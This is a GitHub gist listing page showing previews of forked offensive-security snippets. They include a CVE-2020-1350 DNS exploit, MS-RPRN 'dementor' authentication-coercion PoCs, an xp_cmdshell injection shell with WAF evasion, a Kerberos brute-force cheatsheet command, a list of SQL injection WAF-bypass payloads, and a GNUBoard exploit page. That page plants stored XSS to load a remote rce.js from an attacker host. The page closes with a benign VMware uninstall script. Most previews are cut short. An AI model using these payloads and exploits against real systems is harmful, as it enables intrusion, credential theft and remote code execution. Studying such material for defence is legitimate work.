Skip to content

Instantly share code, notes, and snippets.

View idkwim's full-sized avatar

. idkwim

100 followers · 49 following
  • south korea
View GitHub Profile
@idkwim
idkwim / CVE-2020-1350.py
Created December 27, 2021 11:07 — forked from joaovarelas/CVE-2020-1350.py
#!/usr/bin/env python3
"""cve-2020-1350.py: Windows DNS Server Vulnerability"""
__author__ = "@joaovarelas"
__date__ = "July, 2020"
import binascii,socket,struct
from dnslib import *
@idkwim
idkwim / dementor.py
Created August 10, 2021 04:12 — forked from S3cur3Th1sSh1t/dementor.py
MS-RPRN exploit python
#!/usr/bin/env python
# originally by 3xocyte, modified by agsolino after native MS-RPRN functionality was added to impacket
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@idkwim
idkwim / dementor.py
Created August 10, 2021 04:10 — forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
@idkwim
idkwim / CSM_pocs.md
Created November 21, 2020 13:38 — forked from Frycos/CSM_pocs.md

TLDR

Cisco Security Manager is an enterprise-class security management application that provides insight into and control of Cisco security and network devices. Cisco Security Manager offers comprehensive security management (configuration and event management) across a wide range of Cisco security appliances, including Cisco ASA Adaptive Security Appliances, Cisco IPS Series Sensor Appliances, Cisco Integrated Services Routers (ISRs), Cisco Firewall Services Modules (FWSMs), Cisco Catalyst, Cisco Switches and many more. Cisco Security Manager allows you to manage networks of all sizes efficiently-from small networks to large networks consisting of hundreds of devices.

Several pre-auth vulnerabilities were submitted to Cisco on 2020-07-13 and (according to Cisco) patched in version 4.22 on 2020-11-10. Release notes didn't state anything about the vulnerabilities, security advisories were not published. All payload are processed in the context of NT AUTHORITY\SYSTEM.

@idkwim
idkwim / mashell.py
Created October 14, 2020 05:45 — forked from notdodo/mashell.py
Execute command using HEX or CHAR encoding. Bypass WAF and IPS filtering enabling RCE using xp_cmdshell: https://knifesec.com/evading-sql-injection-filters-to-get-rce/
#!/usr/bin/env python3
# Injector script to get a pseudo-interactive shell using xp_cmdshell
# Source post:
# Author: notdodo
# https://twitter.com/_d_0_d_o_
#
# USAGE: python3 ./mashell.py "whoami /priv"
#
import binascii
import hashlib
@idkwim
idkwim / mashell.py
Created October 14, 2020 05:45 — forked from notdodo/mashell.py
Execute command using HEX or CHAR encoding. Bypass WAF and IPS filtering enabling RCE using xp_cmdshell: https://knifesec.com/evading-sql-injection-filters-to-get-rce/
#!/usr/bin/env python3
# Injector script to get a pseudo-interactive shell using xp_cmdshell
# Source post:
# Author: notdodo
# https://twitter.com/_d_0_d_o_
#
# USAGE: python3 ./mashell.py "whoami /priv"
#
import binascii
import hashlib
@idkwim
idkwim / kerberos_attacks_cheatsheet.md
Created September 30, 2020 02:56 — forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@idkwim
idkwim / sqli-bypass-waf.txt
Created May 28, 2020 06:46 — forked from zetc0de/sqli-bypass-waf.txt
Bypass WAF Sql Injection
[~] order by [~]
/**/ORDER/**/BY/**/
/*!order*/+/*!by*/
/*!ORDER BY*/
/*!50000ORDER BY*/
/*!50000ORDER*//**//*!50000BY*/
/*!12345ORDER*/+/*!BY*/
[~] UNION select [~]
@idkwim
idkwim / exploit.html
Created April 7, 2020 13:45 — forked from stypr/exploit.html
GNUBoard RCE ~2019.1
<!--
Stored XSS (2019.01.02)
-->
<form action="http://10.10.10.60/gnuboard5/adm/sms_admin/form_group_update.php" method="POST">
<input type='hidden' name='fg_no' value=''>
<input type='hidden' name='fg_name' id='payload' value=''>
</form>
<script>
var random = Math.round(Math.random() * 1000000000);
var script_url = '//10.10.10.30/vulnerable_rce_good_for_reason/rce.js'; // RCE from admin
@idkwim
idkwim / uninstall_vmware.sh
Created January 31, 2020 02:13
Completely uninstall VMWare on macOS
#!/usr/bin/env bash
# Usage: bash uninstall_vmware.bash
remove() {
entry="$1"
echo -ne "Removing $entry ["
sudo rm -rf "$entry"
if [[ ! -e "$entry" ]]; then
echo -ne "OK"